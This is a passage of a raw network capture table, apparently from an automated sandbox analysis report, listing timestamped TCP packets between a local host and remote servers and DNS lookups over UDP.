                                                                          Aug 29, 2024 17:12:27.289989948 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290026903 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290029049 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.290036917 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290072918 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.290081024 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290141106 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290173054 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290183067 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.290189981 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290913105 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290955067 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.290958881 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290968895 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.290994883 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.291708946 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.291866064 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.291920900 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.291928053 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.291974068 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.292877913 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.293107033 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.293323040 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.293363094 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.293370962 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.293797016 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.293836117 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.293842077 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.293859959 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.293900967 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.463804960 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:27.513581991 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:27.513597012 CEST4435379854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:27.513923883 CEST4435379854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:27.516149998 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:27.516205072 CEST4435379854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:27.516300917 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:27.556509972 CEST4435379854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:27.590459108 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:27.590488911 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:27.591994047 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:27.592015982 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:27.624753952 CEST4435379854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:27.624804020 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:27.634217024 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.634227037 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.684540033 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:27.684549093 CEST4435379854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:27.896682978 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:27.896730900 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:27.896805048 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:27.904966116 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:27.904979944 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:27.916500092 CEST53800443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:27.916521072 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:27.916575909 CEST53800443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:27.916791916 CEST53800443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:27.916805029 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:28.606805086 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:28.606831074 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:28.606940031 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:28.607184887 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:28.607193947 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:28.784203053 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:28.789493084 CEST53800443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:28.789508104 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:28.789694071 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:28.789771080 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:28.789875984 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:28.790627003 CEST53800443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:28.790694952 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:28.790810108 CEST53800443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:28.795398951 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:28.795412064 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:28.795619965 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:28.836499929 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:28.956855059 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:28.958936930 CEST44353754216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:12:28.959001064 CEST44353754216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:12:28.959043980 CEST53754443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:12:28.980005980 CEST53754443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:12:28.980015039 CEST44353754216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:12:29.070698977 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.070770979 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.071181059 CEST53800443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:29.079463959 CEST53800443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:29.079476118 CEST44353800172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.445782900 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.446579933 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:29.446587086 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.446939945 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.447451115 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:29.447510004 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.447635889 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:29.460850954 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:29.488502026 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.508505106 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.652499914 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.652559042 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:29.676573038 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.676594973 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.676601887 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.676656961 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.676664114 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:29.676668882 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.676680088 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.676704884 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.676718950 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:29.676727057 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:29.676748991 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:29.677114010 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.677120924 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.677170038 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:29.677177906 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.677362919 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:29.677598953 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:29.744752884 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.744923115 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:29.745158911 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:30.223104000 CEST53802443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:30.223118067 CEST44353802172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:30.870852947 CEST53799443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:12:30.870882988 CEST4435379952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:12:31.153805017 CEST49703443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.153913975 CEST49703443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.154361010 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.154385090 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:31.154458046 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.155544043 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.155558109 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:31.158549070 CEST4434970323.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:31.158677101 CEST4434970323.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:31.758878946 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:31.759000063 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.885601997 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.885626078 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:31.885902882 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:31.885951042 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.895370960 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.895395994 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:31.895710945 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:31.895715952 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:32.176649094 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:32.176697969 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:32.177272081 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:32.177316904 CEST4435380823.1.237.91192.168.2.5
                                                                          Aug 29, 2024 17:12:32.177371025 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:32.185966969 CEST53808443192.168.2.523.1.237.91
                                                                          Aug 29, 2024 17:12:59.275988102 CEST4970880192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:12:59.410410881 CEST804970815.197.204.56192.168.2.5
                                                                          Aug 29, 2024 17:13:00.760796070 CEST49713443192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:00.760819912 CEST4434971315.197.204.56192.168.2.5
                                                                          Aug 29, 2024 17:13:03.526462078 CEST4970780192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:03.531443119 CEST804970715.197.204.56192.168.2.5
                                                                          Aug 29, 2024 17:13:07.352417946 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:07.352468014 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:07.352535963 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:07.352922916 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:07.352936983 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.173590899 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.173661947 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.177275896 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.177289009 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.177489996 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.185297012 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.232510090 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.443376064 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.443408012 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.443422079 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.443483114 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.443501949 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.443550110 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.444443941 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.444488049 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.444499016 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.444506884 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.444540024 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.444545031 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.444591999 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.447453022 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.447465897 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:08.447478056 CEST53809443192.168.2.552.165.165.26
                                                                          Aug 29, 2024 17:13:08.447483063 CEST4435380952.165.165.26192.168.2.5
                                                                          Aug 29, 2024 17:13:09.963596106 CEST53789443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:13:09.963624001 CEST44353789142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:13:10.166970968 CEST53786443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:13:10.166999102 CEST44353786142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:13:14.652544022 CEST804970815.197.204.56192.168.2.5
                                                                          Aug 29, 2024 17:13:14.652601957 CEST4970880192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:14.918420076 CEST4970880192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:14.923280954 CEST804970815.197.204.56192.168.2.5
                                                                          Aug 29, 2024 17:13:16.915824890 CEST49713443192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:16.915956974 CEST4434971315.197.204.56192.168.2.5
                                                                          Aug 29, 2024 17:13:16.916038990 CEST49713443192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:18.417881966 CEST53811443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:13:18.417932034 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:18.417996883 CEST53811443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:13:18.418277979 CEST53811443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:13:18.418287992 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:19.077862978 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:19.078236103 CEST53811443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:13:19.078262091 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:19.078579903 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:19.078847885 CEST53811443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:13:19.078908920 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:19.119704962 CEST53811443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:13:26.918589115 CEST53786443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:13:26.918638945 CEST53789443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:13:26.918709993 CEST44353786142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:13:26.918725967 CEST44353789142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:13:26.918786049 CEST53786443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:13:26.918804884 CEST53789443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:13:28.992216110 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:28.992271900 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:28.992321014 CEST53811443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:13:30.919091940 CEST53811443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:13:30.919126987 CEST44353811216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:13:33.521749973 CEST804970715.197.204.56192.168.2.5
                                                                          Aug 29, 2024 17:13:33.521924019 CEST4970780192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:34.918714046 CEST4970780192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:34.923470974 CEST804970715.197.204.56192.168.2.5

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Aug 29, 2024 17:12:10.960086107 CEST5493253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:10.992037058 CEST53549321.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:13.865864992 CEST53582301.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:14.046870947 CEST6391253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:14.047013998 CEST5452853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:14.054627895 CEST53654351.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:14.059910059 CEST53545281.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:14.230212927 CEST53639121.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:14.931062937 CEST5668153192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:14.931216002 CEST5905453192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:14.944226980 CEST53566811.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:14.945142984 CEST53590541.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:15.159794092 CEST53521811.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:15.346203089 CEST5995353192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:15.353899956 CEST53599531.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:15.764729023 CEST5622553192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:15.764920950 CEST5157553192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:15.765275955 CEST5068853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:15.765399933 CEST5036153192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:15.765850067 CEST5011753192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:15.766103983 CEST6214353192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:15.771605015 CEST53562251.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:15.771625996 CEST53515751.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:15.771872997 CEST53506881.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:15.772713900 CEST53503611.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:17.341173887 CEST5872953192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:17.341335058 CEST6310153192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:17.420237064 CEST53587291.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:17.420550108 CEST53631011.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:17.472395897 CEST5692653192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:17.472742081 CEST5412853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:17.473582029 CEST5427853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:17.473762989 CEST6371853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:17.479425907 CEST53569261.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:17.481298923 CEST53541281.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:17.481981993 CEST53637181.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:17.482273102 CEST53542781.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:18.055983067 CEST6070553192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:18.057051897 CEST5552553192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:18.059462070 CEST6311253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:18.059663057 CEST6262453192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:18.062526941 CEST53607051.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:18.064054966 CEST53555251.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:18.066381931 CEST53626241.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:18.066971064 CEST53631121.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:18.365657091 CEST5213353192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:18.365761995 CEST5113453192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:18.372340918 CEST53521331.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:18.372389078 CEST53511341.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:19.276772022 CEST5930853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:19.277312040 CEST5139553192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:19.295773983 CEST53593081.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:19.295789003 CEST53513951.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:20.456661940 CEST5067053192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:20.456815958 CEST5831253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:20.459553957 CEST5805253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:20.459781885 CEST5048353192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:20.463551044 CEST53583121.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:20.464247942 CEST53506701.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:20.466523886 CEST53504831.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:20.466562986 CEST53580521.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:20.482933044 CEST6390653192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:20.483064890 CEST6318653192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:20.896522999 CEST6064053192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:20.896697044 CEST5573353192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:20.903687000 CEST53606401.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:20.904326916 CEST53557331.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:21.132491112 CEST5359753192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:21.132661104 CEST5271953192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:21.143326998 CEST53527191.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:21.152234077 CEST53535971.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:22.608262062 CEST5941253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:22.608814955 CEST5097353192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:22.619158030 CEST53594121.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:22.619266033 CEST53509731.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:23.623505116 CEST6529853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:23.623783112 CEST4995753192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:23.908694983 CEST53652981.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:23.908706903 CEST53499571.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:24.065898895 CEST5325753192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:24.066342115 CEST6440253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:24.073435068 CEST53532571.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:24.074997902 CEST53644021.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:26.018728018 CEST6245853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:26.018879890 CEST6428153192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:26.026874065 CEST53624581.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:26.027375937 CEST53642811.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:28.232295990 CEST5390853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:28.404875994 CEST53539081.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:28.578124046 CEST5633953192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:28.787944078 CEST53563391.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:29.666058064 CEST6068053192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:29.666214943 CEST6439553192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:29.675889015 CEST53643951.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:29.839440107 CEST53606801.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:29.847732067 CEST6452953192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:29.857098103 CEST53645291.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:30.151204109 CEST5295853192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:30.151901960 CEST5676253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:30.208724976 CEST53529581.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:30.208878040 CEST53567621.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:30.397177935 CEST4937853192.168.2.58.8.8.8
                                                                          Aug 29, 2024 17:12:30.397434950 CEST6412653192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:30.617733955 CEST53641261.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:30.617774963 CEST53493788.8.8.8192.168.2.5
                                                                          Aug 29, 2024 17:12:31.583036900 CEST5256953192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:31.583197117 CEST6414353192.168.2.51.1.1.1
